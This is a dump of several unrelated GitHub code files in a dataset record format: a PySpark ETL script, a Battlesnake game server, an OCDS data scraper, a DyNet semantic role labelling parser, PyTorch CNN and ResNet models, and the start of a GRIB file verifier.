df.withColumn('date_time', get_datetime('ts'))\n\n    # Create a view for easier read\n    df.createOrReplaceTempView(\"log_data\")\n\n    # extract columns for users table\n    users_table = spark.sql(\"\"\"\n        SELECT DISTINCT qry.userId, qry.firstName, qry.lastName,\n            qry.gender, qry.level\n        FROM (\n            SELECT date_time, userId, firstName, lastName, gender, level,\n                RANK() OVER (\n                    PARTITION BY userId ORDER BY date_time DESC\n                ) AS rank\n            FROM log_data\n        ) AS qry\n        WHERE qry.rank = 1\n    \"\"\")\n\n    # write users table to parquet files\n    users_table.write.mode('overwrite').parquet(output_data + \"users_table\")\n\n    # extract columns to create time table\n    time_table = df.select(\n        \"date_time\",\n        hour(\"date_time\").alias('hour'),\n        dayofmonth(\"date_time\").alias('day'),\n        weekofyear(\"date_time\").alias('week'),\n        month(\"date_time\").alias('month'),\n        year(\"date_time\").alias('year'),\n        date_format(\"date_time\", \"u\").alias('weekday')\n    ).distinct()\n\n    # write time table to parquet files partitioned by year and month\n    time_table.write.partitionBy(\"year\", \"month\") \\\n        .parquet(output_data + \"time_table\")\n\n    # read in song data to use for songplays table\n    song_df = spark.read.parquet(output_data + \"songs_table\")\n\n    # Create view for workability\n    song_df.createOrReplaceTempView(\"songs_table\")\n\n    # register the remaining views referenced by the songplays query\n    time_table.createOrReplaceTempView(\"time_table\")\n    artists_df = spark.read.parquet(output_data + \"artists_table\")\n    artists_df.createOrReplaceTempView(\"artists_table\")\n\n    # extract columns from joined song and log datasets to create\n    # songplays table\n    songplays_table = spark.sql(\"\"\"\n        SELECT logs.date_time, times.year, times.month, logs.userId, logs.level,\n            que.song_id, que.artist_id, logs.sessionId, logs.location,\n            logs.userAgent\n        FROM log_data logs\n        JOIN time_table times ON logs.date_time = times.date_time\n        LEFT JOIN (\n            SELECT songs.song_id, songs.title, art.artist_id, art.artist_name\n            FROM songs_table songs\n            JOIN artists_table art ON songs.artist_id = art.artist_id\n        ) AS que ON logs.song = que.title AND logs.artist = que.artist_name\n    \"\"\")\n\n    # write songplays table to parquet files partitioned by year and month\n    songplays_table.write.partitionBy(\"year\", \"month\") \\\n        .parquet(output_data + \"songplays_table\")\n\n\ndef main():\n    '''\n    The main function\n    '''\n    spark = create_spark_session()\n    input_data = \"s3a://udacity-dend/\"\n    output_data = \"s3a://data_eng/project4/\"\n\n    process_song_data(spark, input_data, output_data)\n    process_log_data(spark, input_data, output_data)\n\n\nif __name__ == \"__main__\":\n    
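# The epoch-millis conversion in process_log_data can also stay in the JVM
# instead of going through a Python UDF; an equivalent column expression
# (df here stands for any DataFrame with an epoch-millis 'ts' column):
from pyspark.sql.functions import col, from_unixtime

df = df.withColumn("date_time",
                   from_unixtime(col("ts") / 1000).cast("timestamp"))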
main()\n","repo_name":"rtelles64/data_lake","sub_path":"etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":5719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13611222813","text":"import os\nimport random\nimport json\nimport cherrypy\nimport copy\nimport math\n\n\"\"\"\nThis is a simple Battlesnake server written in Python.\nFor instructions see https://github.com/BattlesnakeOfficial/starter-snake-python/README.md\n\"\"\"\n\n\nclass Battlesnake(object):\n \n @cherrypy.expose\n def index(self):\n # If you open your snake URL in a browser you should see this message.\n return \"Your Battlesnake is alive!\"\n\n @cherrypy.expose\n def ping(self):\n # The Battlesnake engine calls this function to make sure your snake is working.\n return \"pong\"\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n @cherrypy.tools.json_out()\n def start(self):\n # This function is called everytime your snake is entered into a game.\n # cherrypy.request.json contains information about the game that's about to be played.\n # TODO: Use this function to decide how your snake is going to look on the board.\n data = cherrypy.request.json\n print(\"START\")\n return {\"color\": \"#02fa44\", \"headType\": \"smile\", \"tailType\": \"skinny\"}\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n @cherrypy.tools.json_out()\n def move(self):\n # This function is called on every turn of a game. It's how your snake decides where to move.\n # Valid moves are \"up\", \"down\", \"left\", or \"right\".\n # TODO: Use the information in cherrypy.request.json to decide your next move.\n data = cherrypy.request.json\n\n print(\"current turn:\")\n print(data)\n\n class coord:\n def __init__(self, xcoord, ycoord):\n self.x = xcoord\n self.y = ycoord\n\n\n class get_data:\n def __init__(self):\n self.boardsize = coord(data.get(\"board\").get(\"width\"), data.get(\"board\").get(\"height\"))\n self.food = [coord(data.get(\"board\").get(\"food\")[i].get(\"x\"), data.get(\"board\").get(\"food\")[i].get(\"y\")) \\\n for i in range(len(data.get(\"board\").get(\"food\")))]\n self.turn = data.get(\"turn\")\n self.snakes = len(data.get(\"board\").get(\"snakes\"))\n\n\n class snake:\n def __init__(self, num):\n self.body = [coord(data.get(\"board\").get(\"snakes\")[num].get(\"body\")[i].get(\"x\") , \\\n data.get(\"board\").get(\"snakes\")[num].get(\"body\")[i].get(\"y\")) \\\n for i in range(0, len(data.get(\"board\").get(\"snakes\")[num].get(\"body\")))]\n self.head = self.body[0]\n self.health = data.get(\"board\").get(\"snakes\")[num].get(\"health\")\n self.size = len(data.get(\"board\").get(\"snakes\")[num].get(\"body\"))\n\n\n\n def empty_board():\n board = [[\"empty\" for i in range(Gdata.boardsize.x)] for j in range(Gdata.boardsize.y)]\n return board\n\n\n def update_board(allsnakes):\n updated_board = empty_board()\n\n #Add board edges\n for i in range(Gdata.boardsize.x):\n for j in range(Gdata.boardsize.y):\n if i == 0 or j == 0 or i == Gdata.boardsize.x - 1 or j == Gdata.boardsize.y - 1:\n updated_board[i][j] = \"edge \"\n \n #Add food to board (but not if the food is in one of the corners)\n for i in range(len(Gdata.food)):\n if not (Gdata.food[i].x in {0, Gdata.boardsize.x -1} and Gdata.food[i].y in {0, Gdata.boardsize.y -1}):\n updated_board[Gdata.food[i].x][Gdata.food[i].y] = \"food \"\n\n #Add snakes to board\n for i in range(Gdata.snakes):\n for j in range(allsnakes[i].size -1, -1, -1):\n if (i == mine): # If its my snake, label body parts with M\n if (j 
== 0):\n updated_board[allsnakes[i].head.x][allsnakes[i].head.y] = \"Mhead\"\n else:\n updated_board[allsnakes[i].body[j].x][allsnakes[i].body[j].y] = \"Mbody\"\n else: # If its not my snake, label body parts with that snake's index\n if (j == 0):\n updated_board[allsnakes[i].head.x][allsnakes[i].head.y] = f\"{i}head\"\n else:\n updated_board[allsnakes[i].body[j].x][allsnakes[i].body[j].y] = f\"{i}body\"\n\n #Add potential next moves\n for i in range(Gdata.snakes):\n #Only want other snake's moves and only want potential moves in open spaces\n if (i != mine):\n head = coord(allsnakes[i].head.x, allsnakes[i].head.y)\n if head.x != Gdata.boardsize.x - 1:\n if updated_board[head.x + 1][head.y] in {\"empty\", \"food \", \"edge \"}:\n updated_board[head.x + 1][head.y] = f\"{i}next\"\n if head.x != 0:\n if updated_board[head.x - 1][head.y] in {\"empty\", \"food \", \"edge \"}:\n updated_board[head.x - 1][head.y] = f\"{i}next\"\n if head.y != Gdata.boardsize.y - 1:\n if updated_board[head.x][head.y + 1] in {\"empty\", \"food \", \"edge \"}:\n updated_board[head.x][head.y + 1] = f\"{i}next\"\n if head.y != 0:\n if updated_board[head.x][head.y - 1] in {\"empty\", \"food \", \"edge \"}:\n updated_board[head.x][head.y - 1] = f\"{i}next\"\n return updated_board\n\n\n def print_board(board):\n for y in range(len(board[0])):\n for x in range(len(board)):\n if (board[x][y] == \"empty\"):\n print(\"-----\", end = \" \")\n else: print(board[x][y], end = \" \")\n if (x == len(board)-1):\n print(\"\")\n\n\n def print_snake(snake):\n for i in range(len(snake.body)):\n print(f\"x : {snake.body[i].x}, y : {snake.body[i].y} \")\n\n def move(snake, move):\n if move == \"left\":\n snake.head.x -= 1\n if move == \"right\":\n snake.head.x += 1\n if move == \"up\":\n snake.head.y -= 1\n if move == \"down\":\n snake.head.y += 1\n\n def check_moves(mysnake, board, itteration):\n moves = {\"left\": 0, \"right\": 0, \"up\": 0, \"down\": 0}\n\n #Remove possibility of hitting a wall or the body of a snake\n if (mysnake.body[0].x == 0 or board[mysnake.body[0].x - 1][mysnake.body[0].y][1:5] in {\"body\", \"head\"}): \n del moves[\"left\"]\n if (mysnake.body[0].x == Gdata.boardsize.x - 1 or board[mysnake.body[0].x + 1][mysnake.body[0].y][1:5] in {\"body\", \"head\"}):\n del moves[\"right\"]\n if (mysnake.body[0].y == 0 or board[mysnake.body[0].x][mysnake.body[0].y - 1][1:5] in {\"body\", \"head\"}):\n del moves[\"up\"]\n if (mysnake.body[0].y == Gdata.boardsize.y - 1 or board[mysnake.body[0].x][mysnake.body[0].y + 1][1:5] in {\"body\", \"head\"}):\n del moves[\"down\"]\n\n #Assign a score to each move based on whats in that square\n \n if \"left\" in moves.keys():\n square = board[mysnake.body[0].x - 1][mysnake.body[0].y]\n if square in {\"empty\", \"food \"}:\n moves[\"left\"] = 3\n elif square == \"edge \":\n moves[\"left\"] = 2\n elif square[1:5] == \"next\":\n if mysnake.size > allsnakes[int(square[0])].size:\n moves[\"left\"] = 4\n else:\n moves[\"left\"] = 1\n\n if \"right\" in moves.keys():\n square = board[mysnake.body[0].x + 1][mysnake.body[0].y]\n if square in {\"empty\", \"food \"}:\n moves[\"right\"] = 3\n elif square == \"edge \":\n moves[\"right\"] = 2\n elif square[1:5] == \"next\":\n if mysnake.size > allsnakes[int(square[0])].size:\n moves[\"right\"] = 4\n else:\n moves[\"right\"] = 1\n\n if \"up\" in moves.keys():\n square = board[mysnake.body[0].x][mysnake.body[0].y - 1]\n if square in {\"empty\", \"food \"}:\n moves[\"up\"] = 3\n elif square == \"edge \":\n moves[\"up\"] = 2\n elif square[1:5] == 
\"next\":\n if mysnake.size > allsnakes[int(square[0])].size:\n moves[\"up\"] = 4\n else:\n moves[\"up\"] = 1\n\n if \"down\" in moves.keys():\n square = board[mysnake.body[0].x][mysnake.body[0].y + 1]\n if square in {\"empty\", \"food \"}:\n moves[\"down\"] = 3\n elif square == \"edge \":\n moves[\"down\"] = 2\n elif square[1:5] == \"next\":\n if mysnake.size > allsnakes[int(square[0])].size:\n moves[\"down\"] = 4\n else:\n moves[\"down\"] = 1\n\n return moves\n \n def simulate_move(allsnakes, itteration):\n\n allsnakes_copy = copy.deepcopy(allsnakes)\n mysnake_copy = allsnakes_copy[mine]\n #For all snakes\n for s in range(Gdata.snakes):\n #For each body part, starting at the tail\n for p in range(allsnakes_copy[s].size -1, 0, -1):\n #Shift one turn forward\n allsnakes_copy[s].body[p] = coord(allsnakes_copy[s].body[p-1].x, allsnakes_copy[s].body[p-1].y)\n\n new_board = update_board(allsnakes_copy) \n\n possible_moves = check_moves(mysnake_copy, new_board, itteration)\n print (f\"Possible moves: {possible_moves}\")\n\n if itteration == 0:\n for k in copy.deepcopy(possible_moves).keys():\n allsnakes_copy2 = copy.deepcopy(allsnakes_copy)\n move(allsnakes_copy2[mine], k)\n if simulate_move(allsnakes_copy2, itteration + 1) == False:\n del possible_moves[k]\n\n max = 0\n for k in possible_moves.keys():\n if possible_moves[k] > max:\n max = possible_moves[k]\n\n final_moves = copy.deepcopy(possible_moves)\n\n for k in possible_moves.keys():\n if possible_moves[k] != max:\n del final_moves[k]\n\n return final_moves\n\n elif itteration == 1:\n if len(possible_moves) > 1:\n itteration += 1\n for k in copy.deepcopy(possible_moves).keys():\n allsnakes_copy2 = copy.deepcopy(allsnakes_copy)\n move(allsnakes_copy2[mine], k)\n if simulate_move(allsnakes_copy2, itteration) == True:\n return True\n\n return False\n\n else: \n if len(possible_moves) == 0:\n return False\n if len(possible_moves) >= 2:\n return True\n if len(possible_moves) == 1:\n\n for k in possible_moves.keys(): \n move(mysnake_copy, k)\n return simulate_move(allsnakes_copy, itteration + 1)\n\n def closest_food():\n head = mysnake.head\n closest = coord((Gdata.boardsize.x - 1)/2, (Gdata.boardsize.y - 1)/2)\n min_dist = 20\n for i in range(len(Gdata.food)):\n distance = abs(head.x - Gdata.food[i].x) + abs(head.y - Gdata.food[i].y)\n\n if distance < min_dist and not (Gdata.food[i].x in {0, Gdata.boardsize.x -1} and Gdata.food[i].y in {0, Gdata.boardsize.y -1}):\n min_dist = distance\n closest = coord(Gdata.food[i].x, Gdata.food[i].y)\n\n #print(f\"closest food is {min_dist} units away at x = {closest.x}, y = {closest.y}\")\n return closest\n\n def move_to_target(moves, target):\n\n if len(moves) < 2:\n return moves\n \n x_dif = target.x - mysnake.head.x\n y_dif = target.y - mysnake.head.y\n\n if x_dif == 0:\n if y_dif < 0:\n if \"up\" in moves:\n return [\"up\"]\n elif (\"left\" in moves or \"right\" in moves) and \"down\" in moves:\n moves.remove(\"down\")\n else:\n if \"down\" in moves:\n return [\"down\"]\n elif (\"left\" in moves or \"right\" in moves) and \"up\" in moves:\n moves.remove(\"up\")\n\n elif y_dif == 0:\n if x_dif > 0:\n if \"right\" in moves:\n return [\"right\"]\n elif (\"up\" in moves or \"down\" in moves) and \"left\" in moves:\n moves.remove(\"left\")\n else: \n if \"left\" in moves:\n return [\"left\"]\n elif (\"up\" in moves or \"down\" in moves) and \"right\" in moves:\n moves.remove(\"right\")\n\n elif y_dif > 0:\n if x_dif > 0 and (\"down\" in moves or \"right\" in moves):\n if \"up\" in moves:\n 
moves.remove(\"up\")\n if \"left\" in moves:\n moves.remove(\"left\")\n elif x_dif < 0 and (\"down\" in moves or \"left\" in moves):\n if \"up\" in moves:\n moves.remove(\"up\")\n if \"right\" in moves:\n moves.remove(\"right\")\n \n elif y_dif < 0:\n if x_dif > 0 and (\"up\" in moves or \"right\" in moves):\n if \"down\" in moves:\n moves.remove(\"down\")\n if \"left\" in moves:\n moves.remove(\"left\")\n elif x_dif < 0 and (\"up\" in moves or \"left\" in moves):\n if \"down\" in moves:\n moves.remove(\"down\")\n if \"right\" in moves:\n moves.remove(\"right\")\n\n \n\n # if abs(x_dif) > abs(y_dif):\n # if x_dif > 0 and \"right\" in moves:\n # return [\"right\"]\n # if x_dif < 0 and \"left\" in moves:\n # return [\"left\"]\n # else:\n # if y_dif > 0 and \"down\" in moves:\n # return [\"down\"]\n # if y_dif < 0 and \"up\" in moves:\n # return [\"up\"]\n\n return moves\n\n Gdata = get_data()\n allsnakes = [snake(i) for i in range(Gdata.snakes)]\n\n mine = 0\n for i in range (len(allsnakes)):\n if (data.get(\"board\").get(\"snakes\")[i] == data.get(\"you\")):\n mine = i\n break\n\n mysnake = allsnakes[mine]\n\n board = update_board(allsnakes)\n print_board(board)\n possible_moves = simulate_move(allsnakes, 0)\n\n\n final_moves = list(possible_moves.keys())\n print(f\"final moves: {final_moves}\")\n\n \n max_size = 3\n biggest_snake = 0\n for i in range(Gdata.snakes):\n if i != mine and max_size < allsnakes[i].size:\n max_size = allsnakes[i].size\n biggest_snake = i\n\n target = coord(0,0)\n if list(possible_moves.values())[0] == 1:\n print(\"in danger, targetting away from closest food\")\n target = coord(Gdata.boardsize.x - closest_food().x - 1, Gdata.boardsize.y - closest_food().y - 1)\n else:\n if mysnake.size <= max_size:\n print(\"too small, targetting food\")\n target = closest_food()\n else: \n print(\"big enough, targetting biggest snake\")\n target = allsnakes[biggest_snake].head\n \n final_moves = move_to_target(final_moves, target)\n\n move = random.choice(final_moves)\n\n print(f\"chose: {move}\")\n\n return{\"move\": move}\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n def end(self):\n # This function is called when a game your snake was in ends.\n # It's purely for informational purposes, you don't have to make any decisions here.\n data = cherrypy.request.json\n print(\"END\")\n return \"ok\"\n\n\nif __name__ == \"__main__\":\n server = Battlesnake()\n cherrypy.config.update({\"server.socket_host\": \"0.0.0.0\"})\n cherrypy.config.update(\n {\"server.socket_port\": int(os.environ.get(\"PORT\", \"8080\")),}\n )\n print(\"Starting Battlesnake Server...\")\n cherrypy.quickstart(server)\n","repo_name":"chyggen/first-snake","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":17115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5131299094","text":"from ocdskingfisher import util\nfrom ocdskingfisher.base import Source\nimport hashlib\n\n\nclass AfghanistanRecordsSource(Source):\n publisher_name = 'Afghanistan'\n url = 'https://ocds.ageops.net/'\n source_id = 'afghanistan_records'\n\n def gather_all_download_urls(self):\n\n r = util.get_url_request('https://ocds.ageops.net/api/ocds/records')\n if r[1]:\n raise Exception(r[1])\n r = r[0]\n out = []\n for data in r.json():\n if not self.sample or (self.sample and len(out) < 10):\n out.append({\n 'url': data,\n 'filename': hashlib.md5(data.encode('utf-8')).hexdigest(),\n 'data_type': 'record',\n })\n return 
out\n","repo_name":"odscjames/lhs-alpha","sub_path":"ocdskingfisher/sources/afghanistan_records.py","file_name":"afghanistan_records.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74709652524","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import division\nimport dynet as dy\nimport numpy as np\nfrom lib import *\n\n\nclass BaseParser(object):\n\tdef __init__(self, vocab, word_dims, pret_dims, lemma_dims, tag_dims, dropout_dim,\n\t\t\t\tlstm_layers, lstm_hiddens, dropout_lstm_input, dropout_lstm_hidden, mlp_size, \n\t\t\t\tdropout_mlp):\n\t\t\n\t\tpc = dy.ParameterCollection()\n\t\tself._vocab = vocab\n\t\tself.word_embs = pc.lookup_parameters_from_numpy(vocab.get_word_embs(word_dims))\n\t\tself.pret_word_embs = pc.lookup_parameters_from_numpy(vocab.get_pret_embs(pret_dims))\n\t\tself.lemma_embs = pc.lookup_parameters_from_numpy(vocab.get_lemma_embs(lemma_dims))\n\t\tself.tag_embs = pc.lookup_parameters_from_numpy(vocab.get_tag_embs(tag_dims))\n\t\t\n\t\tself.LSTM_builders = []\n\t\tinput_dims = word_dims + pret_dims + lemma_dims + tag_dims\n\t\tf = orthonormal_VanillaLSTMBuilder(1, input_dims, lstm_hiddens, pc)\n\t\tb = orthonormal_VanillaLSTMBuilder(1, input_dims, lstm_hiddens, pc)\n\t\tself.LSTM_builders.append((f, b))\n\t\tfor i in xrange(lstm_layers - 1):\n\t\t\tf = orthonormal_VanillaLSTMBuilder(1, 2 * lstm_hiddens, lstm_hiddens, pc)\n\t\t\tb = orthonormal_VanillaLSTMBuilder(1, 2 * lstm_hiddens, lstm_hiddens, pc)\n\t\t\tself.LSTM_builders.append((f, b))\n\t\tself.dropout_lstm_input = dropout_lstm_input\n\t\tself.dropout_lstm_hidden = dropout_lstm_hidden\n\n\t\tW = orthonormal_initializer(mlp_size, 2 * lstm_hiddens)\n\t\tself.mlp_arg_W = pc.parameters_from_numpy(W)\n\t\tself.mlp_pred_W = pc.parameters_from_numpy(W)\n\t\tself.mlp_arg_b = pc.add_parameters((mlp_size,), init = dy.ConstInitializer(0.))\n\t\tself.mlp_pred_b = pc.add_parameters((mlp_size,), init = dy.ConstInitializer(0.))\n\t\tself.mlp_size = mlp_size\n\t\tself.dropout_mlp = dropout_mlp\n\n\t\tself.rel_W = pc.add_parameters((vocab.rel_size * (mlp_size +1) , mlp_size + 1), \n\t\t\t\t\t\t\t\t\t\tinit = dy.ConstInitializer(0.))\n\t\tself._pc = pc\n\n\t\tdef _emb_mask_generator(seq_len, batch_size):\n\t\t\tret = []\n\t\t\tfor i in xrange(seq_len):\n\t\t\t\tword_mask = np.random.binomial(1, 1. - dropout_dim, batch_size).astype(np.float32)\n\t\t\t\ttag_mask = np.random.binomial(1, 1. - dropout_dim, batch_size).astype(np.float32)\n\t\t\t\tscale = 3. 
/ (2.*word_mask + tag_mask + 1e-12)\n\t\t\t\tword_mask *= scale\n\t\t\t\ttag_mask *= scale\n\t\t\t\tword_mask = dy.inputTensor(word_mask, batched = True)\n\t\t\t\ttag_mask = dy.inputTensor(tag_mask, batched = True)\n\t\t\t\tret.append((word_mask, tag_mask))\n\t\t\treturn ret\n\t\tself.generate_emb_mask = _emb_mask_generator\n\n\n\t@property \n\tdef parameter_collection(self):\n\t\treturn self._pc\n\n\n\tdef run(self, word_inputs, lemma_inputs, tag_inputs, pred_golds, rel_targets = None, isTrain = True):\n\t\t# inputs, targets: seq_len x batch_size\n\t\tdef dynet_flatten_numpy(ndarray):\n\t\t\treturn np.reshape(ndarray, (-1,), 'F')\n\n\t\tbatch_size = word_inputs.shape[1]\n\t\tseq_len = word_inputs.shape[0]\n\t\tmask = np.greater(word_inputs, self._vocab.DUMMY).astype(np.float32)\n\t\tnum_tokens = int(np.sum(mask))\n\n\t\tword_embs = [dy.lookup_batch(self.word_embs, \n\t\t\t\t\t\t\t\t\tnp.where(w < self._vocab.words_in_train, w, self._vocab.UNK)\n\t\t\t\t\t\t) for w in word_inputs]\n\t\tpre_embs = [dy.lookup_batch(self.pret_word_embs, w) for w in word_inputs]\n\t\tlemma_embs = [dy.lookup_batch(self.lemma_embs, lemma) for lemma in lemma_inputs]\n\t\ttag_embs = [dy.lookup_batch(self.tag_embs, pos) for pos in tag_inputs]\n\t\t\n\t\tif isTrain:\n\t\t\temb_masks = self.generate_emb_mask(seq_len, batch_size)\n\t\t\temb_inputs = [dy.concatenate([dy.cmult(word, wm), dy.cmult(pre, wm), \n\t\t\t\t\t\t\t\t\t\t\tdy.cmult(lemma, wm), dy.cmult(pos, posm)]) \n\t\t\t\t\t\t\tfor word, pre, lemma, pos, (wm, posm) in \n\t\t\t\t\t\t\t\tzip(word_embs, pre_embs, lemma_embs, tag_embs, emb_masks)]\n\t\t\t\n\t\telse:\n\t\t\temb_inputs = [dy.concatenate([word, pre, lemma, pos]) \n\t\t\t\t\t\t\tfor word, pre, lemma, pos in \n\t\t\t\t\t\t\t\tzip(word_embs, pre_embs, lemma_embs, tag_embs)]\n\n\t\ttop_recur = dy.concatenate_cols(\n\t\t\t\t\t\tbiLSTM(self.LSTM_builders, emb_inputs, batch_size, \n\t\t\t\t\t\t\t\tself.dropout_lstm_input if isTrain else 0., \n\t\t\t\t\t\t\t\tself.dropout_lstm_hidden if isTrain else 0.))\n\t\tif isTrain:\n\t\t\ttop_recur = dy.dropout_dim(top_recur, 1, self.dropout_mlp)\n\n\t\tW_arg, b_arg = dy.parameter(self.mlp_arg_W), dy.parameter(self.mlp_arg_b)\n\t\tW_pred, b_pred = dy.parameter(self.mlp_pred_W), dy.parameter(self.mlp_pred_b)\n\t\targ_hidden = leaky_relu(dy.affine_transform([b_arg, W_arg, top_recur]))\n\t\tpred_hidden = leaky_relu(dy.affine_transform([b_pred, W_pred, top_recur]))\n\t\tif isTrain:\n\t\t\targ_hidden = dy.dropout_dim(arg_hidden, 1, self.dropout_mlp)\n\t\t\tpred_hidden = dy.dropout_dim(pred_hidden, 1, self.dropout_mlp)\n\n\t\tW_rel = dy.parameter(self.rel_W)\n\t\t\n\t\trel_logits = bilinear(arg_hidden, W_rel, pred_hidden, self.mlp_size, seq_len, seq_len, batch_size, \n\t\t\t\t\t\t\t\tnum_outputs = self._vocab.rel_size, bias_x = True, bias_y = True)\n\t\t# (#pred x rel_size x #arg) x batch_size\n\t\tflat_rel_logits = dy.reshape(rel_logits, (seq_len, self._vocab.rel_size), seq_len * batch_size)\n\t\t# (#pred x rel_size) x (#arg x batch_size)\n\n\t\tpredicates_1D = dynet_flatten_numpy(pred_golds)\n\t\tpartial_rel_logits = dy.pick_batch(flat_rel_logits, predicates_1D)\n\t\t# (rel_size) x (#arg x batch_size)\n\n\t\tif isTrain:\n\t\t\tmask_1D = dynet_flatten_numpy(mask)\n\t\t\tmask_1D_tensor = dy.inputTensor(mask_1D, batched = True)\n\t\t\trel_preds = partial_rel_logits.npvalue().argmax(0)\n\t\t\ttargets_1D = dynet_flatten_numpy(rel_targets)\n\t\t\trel_correct = np.equal(rel_preds, targets_1D).astype(np.float32) * mask_1D\n\t\t\trel_accuracy = np.sum(rel_correct)/ 
num_tokens\n\t\t\tlosses = dy.pickneglogsoftmax_batch(partial_rel_logits, targets_1D)\n\t\t\trel_loss = dy.sum_batches(losses * mask_1D_tensor) / num_tokens\n\t\t\treturn rel_accuracy, rel_loss\n\n\t\trel_probs = np.transpose(np.reshape(dy.softmax(dy.transpose(flat_rel_logits)).npvalue(), \n\t\t\t\t\t\t\t\t\t\t\t(self._vocab.rel_size, seq_len, seq_len, batch_size), 'F'))\n\t\toutputs = []\n\t\tfor msk, pred_gold, rel_prob in zip(np.transpose(mask), pred_golds.T, rel_probs):\n\t\t\tmsk[0] = 1.\n\t\t\tsent_len = int(np.sum(msk))\n\t\t\t# pick_shape = pred_gold.shape\n\t\t\t# pick_arrange = np.arange(pick_shape[0])\n\t\t\t# zero_col = np.zeros(pick_shape, dtype = np.int)\n\t\t\t# pred_rel_prob = rel_prob[pick_arrange, zero_col]\n\t\t\tpick_arrange = np.arange(pred_gold.shape[0])\n\t\t\tpred_rel_prob = rel_prob[pick_arrange, pred_gold]\n\t\t\tpred_rel_pred = rel_argmax(pred_rel_prob)\n\t\t\tpred_list = {}\n\t\t\tfor i, rel in enumerate(pred_rel_pred):\n\t\t\t\tif i != 0 and rel != self._vocab.NONE:\n\t\t\t\t\targ_rel_prob = rel_prob[pick_arrange, pred_gold + i]\n\t\t\t\t\targ_rel_pred = rel_argmax(arg_rel_prob)\n\t\t\t\t\tpred_list[i] = arg_rel_pred[1: sent_len]\n\t\t\tpred_list[0] = pred_rel_pred[1: sent_len]\n\t\t\toutputs.append(pred_list)\n\t\treturn outputs\n\n\n\tdef save(self, save_path):\n\t\tself._pc.save(save_path)\n\n\n\tdef load(self, load_path):\n\t\tself._pc.populate(load_path)\n\n","repo_name":"JiaxunCai/Dynet-Biaffine-SRL","sub_path":"CoNLL08-SRL/models/baseParser.py","file_name":"baseParser.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"69908942124","text":"import os\nimport tempfile\nimport numpy as np\nfrom tqdm.notebook import tqdm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.datasets as datasets\nfrom torch.utils.data import DataLoader\nimport torchvision.transforms as transforms\n\nclass conv_net(nn.Module):\n def __init__(self, input_ch, output_ch):\n super(conv_net, self).__init__()\n self.input_ch = input_ch \n self.output_ch = output_ch\n \n self.nn_net = nn.Sequential(\n nn.Conv2d(input_ch, output_ch*2, 4, 2, 1), # 16x16x8\n nn.BatchNorm2d(output_ch*2), \n nn.ReLU(),\n\n nn.Conv2d(output_ch*2, output_ch*4, 4, 2, 1), # 8x8x16\n nn.BatchNorm2d(output_ch*4), \n nn.ReLU(),\n \n nn.Conv2d(output_ch*4, output_ch*8, 4, 2, 1), # 4x4x32\n nn.BatchNorm2d(output_ch*8), \n nn.ReLU(),\n \n nn.Conv2d(output_ch*8, output_ch*16, 4, 2, 1), # 2x2x64\n )\n self.linear = nn.Sequential(\n nn.Linear(256, 10),\n nn.Softmax()\n )\n def forward(self, x):\n x = self.nn_net(x)\n x = self.linear(x.flatten(start_dim=1))\n return x\n\nclass ResNetBlock(nn.Module):\n def __init__(self, n_features):\n super(ResNetBlock, self).__init__()\n self.identity = nn.Identity()\n self.block_layers = nn.Sequential(\n nn.Conv2d(n_features, n_features, 3, 1, 1),\n nn.ReLU(),\n nn.Conv2d(n_features, n_features, 3, 1, 1)\n )\n self.relu = nn.ReLU()\n \n def forward(self, x):\n out = self.block_layers(x)\n out += self.identity(x)\n out = self.relu(out)\n return out\n\nclass ResNet(nn.Module):\n def __init__(self, n_in, n_features, num_res_blocks=3):\n super(ResNet, self).__init__()\n #First conv layers needs to output the desired number of features.\n conv_layers = [nn.Conv2d(n_in, n_features, kernel_size=3, stride=1, padding=1),\n nn.ReLU()]\n for i in range(num_res_blocks):\n conv_layers.append(ResNetBlock(n_features))\n self.res_blocks = 
nn.Sequential(*conv_layers)\n self.fc = nn.Sequential(nn.Linear(32*32*n_features, 2048),\n nn.ReLU(),\n nn.Linear(2048, 512),\n nn.ReLU(),\n nn.Linear(512,10),\n nn.Softmax(dim=1))\n \n def forward(self, x):\n x = self.res_blocks(x)\n #reshape x so it becomes flat, except for the first dimension (which is the minibatch)\n x = x.view(x.size(0), -1)\n out = self.fc(x)\n return out\n","repo_name":"Zurisen/deep-learning-for-computer-vision-DTU","sub_path":"Day1/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34391849342","text":"# ===================================================== #\n# * Contains all staging functions\n# ----------------------------------------------------- #\n# \n# \n# \n# \n# \n#\n# ===================================================== #\n\n\nfrom scripts.services import parse_grib, mkdir\nfrom .config import EXTRACT_GRIB_DIR, STAGED_GRIB_DIR, TRANSFORMED_GRIB_DIR, REQUESTS_DIR\n\nimport logging\nfrom shutil import move\nfrom glob import glob\nimport pandas as pd\nimport os\n\n# ----------------------------------------------------- #\n# * Verify GRIB file\n# ----------------------------------------------------- #\ndef verify_grib(filepath:str) -> bool:\n \"\"\"Verify if corrupted GRIB download\n return: bool, if download is invalid, returns False\n \"\"\"\n logging.info(\" Verifying data..\")\n \n if \".grib\" not in filepath:\n filepath=filepath+\".grib\"\n try: \n df = parse_grib(filepath).to_dataframe().reset_index()\n idx = glob(f\"{filepath}.*\")\n [os.remove(i) for i in idx]\n\n if df.shape[0] > 1 or df.shape[1] > 1:\n logging.info(\" -- OK\")\n return True\n else:\n logging.critical(' Empty Dataframe! %s ' % filepath)\n return None\n\n except Exception as e:\n logging.error(\" Data Verification failed! 
